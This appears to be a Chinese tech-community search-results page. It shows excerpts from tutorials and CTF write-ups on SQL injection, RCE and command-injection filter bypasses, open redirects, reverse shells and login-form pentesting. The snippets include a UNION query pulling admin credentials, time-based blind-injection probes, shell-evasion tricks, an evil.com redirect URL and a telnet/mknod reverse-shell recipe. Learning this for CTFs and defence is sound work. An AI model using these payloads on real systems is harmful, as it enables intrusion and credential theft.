首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

php安全配置记录和常见错误梳理

display_errors = Off 错误,一般常用于开发模式,但是很多应用在正式环境中也忘记了关闭此选项。错误可以暴露出非常多的敏感信息,为攻击者下一步攻击提供便利。推荐关闭此选项。...错误可以暴露出非常多的敏感信息,为攻击者下一步攻击提供便利。推荐关闭此选项。 display_errors = On 开启状态下,若出现错误,则报错,出现错误提示。即显示所有错误信息。...正好可以关闭错误。 log_errors = On //注意,log_errors设置为On,那么dispaly_errors就要设置为Off,这两个不能同时打开。...(unconfigured) 这就导致了php文件修改,在浏览器里访问不会立马生效,需要过30左右才生效!...> 这样访问test.php文件,当它的内容更新时,在新的浏览器页面里打开就是更新的内容了。 如果在老页面里继续访问,第一次刷时清理缓存,第二次刷新就是更新的内容了!

2K70

SQL注入(入门)

但是前台并没有给我们想要的数据,因为后端的PHP代码决定了一次只能显示一行记录,所以我们需要将第二条查询结果放在第一行,此时有多种办法: 在原有语句后面加上limit 1,1参数(取查询结果第一条记录的一条记录...id = -1 UNION SELECT name, pwd From admin; 然后在前端相应的字段,这段代码在数据库中执行表示如下数据: 这样就能获取网页的管理员账号和密码,进入网页后门了...布尔盲注和时间盲注 布尔盲注简述 布尔盲注一般适用于页面没有字段,不支持联合查询,且web页面返回true 或者 false,构造SQL语句,利用and,or等关键字来使其后的语句 true 、 false...使用场景: 页面没有显位置(联合查询注入无效) 页面显示数据库的报错信息(报错注入无效) 无论成功还是失败,页面只响应一种结果(布尔盲注无效) 使用步骤: if(条件表达式,ture,false)...> 此时,只要触发SQL语句的错误,就可以在页面上看到错误信息,MySQL会将语句执行的报错信息输出,这种注入方式称为报错注入。

1.9K30
您找到你想要的搜索结果了吗?
是的
没有找到

SQL注入基础教程

但是前台并没有给我们想要的数据,因为后端的PHP代码决定了一次只能显示一行记录,所以我们需要将第二条查询结果放在第一行,此时有多种办法: 在原有语句后面加上limit 1,1参数(取查询结果第一条记录的一条记录...布尔盲注和时间盲注 布尔盲注和时间盲注 布尔盲注简述 布尔盲注一般适用于页面没有字段,不支持联合查询,且web页面返回true 或者 false,构造SQL语句,利用and,or等关键字来使其后的语句...使用场景: 页面没有显位置(联合查询注入无效) 页面显示数据库的报错信息(报错注入无效) 无论成功还是失败,页面只响应一种结果(布尔盲注无效) 使用步骤: if(条件表达式,ture...判断长度 1 and if((length(查询语句) =1), sleep(5), 3) 如果页面响应时间超过5,说明长度判断正确; 如果页面响应时间不超过5,说明长度判断错误,继续判断长度。...> 此时,只要触发SQL语句的错误,就可以在页面上看到错误信息,MySQL会将语句执行的报错信息输出,这种注入方式称为报错注入。

34550

CTF中的RCE绕过

特殊变量绕过 我们可以使用Linux中的一些特殊变量进行绕过 ps: $* $@ $x ${X} //这里的x代表任意值 ca$*t flag.php ca$@t flag.php...无RCE 无顾名思义没有的远程代码执行漏洞,那对于这种情况我们可以这样思考 sleep函数测试 我们在无rce中可以使用sleep函数测试一下页面的回响,比如说我们这样写 url?...shell获取权限拿flag 更具上面的sleep测试,首先页面,那么我们就不能单纯的在进行我们上面的rce的bypass了,我们可以使用写shell的方式,但是这个shell可以是我们直接写的(...DNSlog dnslog主要争对无的情况 Sqi-Blind RCE SSRF RFI(Remote File inclusion) 但是我们这里只谈RCE的使用。...所以这里跟最初的猜想基本一致,原理也就是通过DNS请求,通过读取日志来获取我们的请求信息。

50820

BUU-WEB-第二章

[SUCTF 2019]EasySQL image.png 我们先输入1,返回有。 image.png 继续测试其它字符,发现输入数字都有,但是如果输入的是字母,则没有。...1.报错注入 1' 输入:1' 没有,应该是存在SQL注入,但是关闭了错误,所以报错注入是行不通了。.../action.php,在重发器里查看它返回的页面是什么。 image.png 我们去访问一下这个页面,好的发现flag.php答案就在眼跟前了。...,但是第二个又是刚才的那可能是flag被过滤了,试一下index.php。...(5)tail:查看尾几行 (6)nl:显示的时候,顺便输出行号 (7)od:以二进制的方式读取档案内容 (8)vi:一种编辑器,这个也可以查看 (9)vim:一种编辑器,这个也可以查看 (10)sort

1.3K40

URL跳转(开放重定向)挖掘技巧及实战案例全汇总

Tips:关注登录的登录请求url。 2、hboeck登录重定向及绕过 登录处重定向,访问: https://tt.hboeck.de/public.php?...3、chaturbate购买成功重定向 在购买成功页面会发生跳转,但对于参数prejoin_data未做验证,访问: https://64.38.230.2/tipping/purchase_success...://www.hackerone.com/index.php/index.php.evil.com,用户将被重定向到www.hackerone.com.evil.com。...6、Twitter xss 访问Twitter链接: https://dev.twitter.com/https:/%5cblackfan.ru/,页面为: 观察在返回头和返回主体,构造payload...在登录成功后会通过HTTP 302重定向到业务界面,将登录凭证通过callback_url调: https://www.digits.com/login?

12.7K32

从一道题目中学习反弹shell

preg_match("/\;|\&|\\$|\x09|\x26|\`|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i",...,那么这里的思路我的话感觉是还有两种,一种是利用重定向符,他这里输出是无的,我们可以把他写到一个文件中,然后访问这个文件来查看,因此payload如下 cmd=ls />a 接下来访问xxx/a...bash的输入,即用bash执行其输出信息,接下来用管道符将bash的输出重定向到talnet连接的攻击机的另一个端口下,其实也就是将回输出到这个端口下了,此时实现了攻击机port端口执行的语句,在port2...端口可以看到信息 第二种方式 先给出参考payload mknod a p; telnet xxx.xxx.xxx.xxx port 0a 就是创建一个管道a,然后用...a,这个时候就实现了标准输入和输出都在同一个管道下 demo 攻击机 监听两个端口,一个用于执行指令,一个用于查看 nc -lvnp 7777 nc -lvnp 6379 目标机 用talent

50610

登录注册表单渗透

5、使用双因子验证策略 二、账号/密码可枚举 [高危] 漏洞描述:由于页面对输入的账号、密码判断的不一样,攻击者可以通过差异进行用户名的枚举,拿到账户名来进行弱口令的爆破。 ?...修改号码为ok 现在可以写个小程序对目标进行循环发包,实现短信轰炸 ?...Note:为了防止被ban,给大家说个技巧:可以停顿十再发下一个;有时虽然后端对其进行验证,但是还是有办法绕过 1>删除cookie值 2>手机号加空格或\n 漏洞修复: 1.后端对同一手机号在某段时间只能发送一条短信...Eg:302重定向,甚至是通过js、meta refresh重定向页面,来引导用户重新下载验证码。这些做法实际是错误的,要是用户拦截了重定向,没有发出新的下载请求呢?上次的验证码是否还可以使用?...Eg:写入验证码的MD5值、 Base64转码等,太容易被黑客逆向破解,得到原值了,即便是加固定salt输出,都是不安全的。

3.2K30

命令注入限制绕过

email=longfei%40163.com+%26+sleep+10+%23&subject=test&message=1111 盲注利用 利用方式1 虽然在命令注入的盲注类型中我们执行的结果并不会在中展示...,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 more 根据窗口大小,一页一页的显示文件内容 less 根据窗口大小,显示文件内容...head 用于显示头几行 tail 用于显示最后几行 nl 类似于cat -n,显示输出行号 tailf 类似于tail -f sort...的提示,说明此处有对字符进行黑名单的过滤处理: 通过简易的测试发现%0a可以用于截断并执行命令,同时我们可以看到这里并没有任何命令的执行,所以说这是一个盲注点 随后通过OOB检测验证漏洞确实存在...ip="的提示信息 随后我们在URL中构造此查询语句并传入参数,可以看到此时会执行命令并进行操作 紧接着我们去拼接其他的命令来尝试执行: /?

30510

SQL注入原理及代码分析(一)

> 在union注入页面中,程序获取GET参数id,对用户传过来的id值没有进行过滤,直接拼接到SQL语句中,在数据库中查询id对应的内容,并将这一条查询结果中的user和password 输出页面。...进行union注入攻击前提是页面。 然后就是注入的常规思路,判断类型,判断字段数,使用union查询相关数据。 布尔盲注攻击 先看代码 查看代码,在报错注入页面中,程序获取GET参数id,将id拼接到SQL语句中查询,如果执行成功,就输出ok,如果出错,就通过echo mysqli_error($con)将错误信息输出页面。...我们可以利用这种错误,通过updatexml()、floor()等函数将我们要查询的内容显示页面上。 例如,我们通过updatexml()获取user()的值,构造如下语句。...得到长度,通过substr()来查询数据库的第一个字母,这里和布尔盲注很类似,构造如下语句。

84710

一文学会curl和curl详解

出现错误时将显示 -L/--location 跟踪重定向 -f/--fail 不输出错误 -n/--netrc 从netrc文件中读取用户名和密码 --netrc-optional 使用 .netrc...-V/--version 显示版本信息 -w/--write-out [format] 什么输出完成 -x/--proxy 在给定的端口上使用HTTP代理 -X/--request 指定什么命令 -y...常用参数分类 # 调试类 -v, --verbose 输出信息 -q, --disable 在第一个参数位置设置...s16 17.传送数据( -d) -d参数用于发送 POST 请求的数据体 最好用登录页面测试,因为你传值过去抓数据,你可以看到你传值有没有成功 curl -d log=aaaa http://...curl -k https://www.xgss.net 26.跟随服务器的重定向(-L) -L参数会让 HTTP 请求跟随服务器的重定向。curl 默认不跟随重定向

5K30

网络安全自学篇-PHP代码审计(五)

3、exec(结果需要用echo,只显示一行) ? ? 4、shell_exec(结果需要用echo显示全部) ? ? 5、反引号`` ?...XSS 跨站脚本攻击 攻击者利用应用程序存在过滤不严的弱点输入可以显示页面上对其他用户造成影响的恶意代码。 ?...挖掘思路 参数无过滤并传入输出函数 1、搜索内容 2、发表文章 3、留言 4、评论回复 5、资料设置 ? 1、反射型(输入–输出) 案例: 1、将前端获取的内容直接输出到浏览器页面 ? ? ?...2、将前端获取的内容直接输出到HTML标签 ? ? 闭合的标签 ? ? ? 3、将前端获取的内容直接输出到 ? ? ? 2、存储型(输入–进入数据库–取出数据-输出) xss.php ? ?...show.php ? ? 插入数据 ? ? 显示 ? ? 3、DOM型(可能是存储型也可能是反射型) 数据流向:URL->浏览器 案例: ? ? ?

48120

MySQL手工注入简述

目录 0x01常用命令 0x02常规union注 0x03extractvalue()注 0x04基于布尔的盲注 0x05基于时间的盲注 0x06文件读取 0x07文件写入 注:在0x06和0x07...这里先说两种常用的单行查询的语句,因为在注入过程中,经常会遇到内容显示不全等现象,所以限制输出行数是很必要的 concat(str1,str2,…) concat()函数用于将多个字符串连接成一个字符串...0x02常规union注 接下来先举一个简单的例子说一下MySQL的注入 这是正常页面 ? 加单引号或者反斜杠等等,看他是否会报错 ?...还有一种是updatexml()注,跟这个完全类似,就不多说了 0x04基于布尔的盲注 这是正常访问的页面 ? 使它报错 ? 基本可以判断存在注入 再确定一下 and 1=1,返回正常 ?...推荐阅读 Linux重定向及反弹shell详解 部署IIS+PHP+Oracle环境 Linux目录结构及开机流程详解 部署IIS+PHP+SQL server环境 Kerberoasting攻击

1.4K10
领券